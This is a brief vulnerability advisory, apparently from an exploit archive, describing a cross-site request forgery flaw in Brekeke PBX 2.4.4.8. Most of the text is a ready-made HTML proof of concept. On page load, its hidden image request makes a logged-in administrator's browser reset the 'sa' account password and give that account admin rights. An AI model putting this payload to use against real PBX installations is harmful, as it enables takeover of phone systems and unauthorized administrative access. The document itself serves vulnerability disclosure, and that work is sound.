source: http://www.securityfocus.com/bid/40407/info

Brekeke PBX is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.

Brekeke PBX 2.4.4.8 is vulnerable; other versions may be affected. 

<html> <body> <img src="http://www.example.com:28080/pbx/gate?bean=pbxadmin.web.PbxUserEdit&user=sa&disabled=false&name=&language=en&password=new_password&password2=new_password&phoneforward=&ringertime=60&noanswerforward=vmsa&noanswerforward.voicemail=on&busyforward=vmsa&busyforward.voicemail=on&dtmfcommand=true&defaultpickup=&index=1&greetingtype=3&recordlength=&messageforward=&email=&emailnotification=true&emailattachment=true&admin=true&userplugin=user&personalivr=&rtprelay=default&payload=&useremotepayload=default&recording=false&canjoin=true&allowjoin=true&aotomonitor=&maxsessioncount=-1&resourcemap=&operation=store" /> </body> </html> 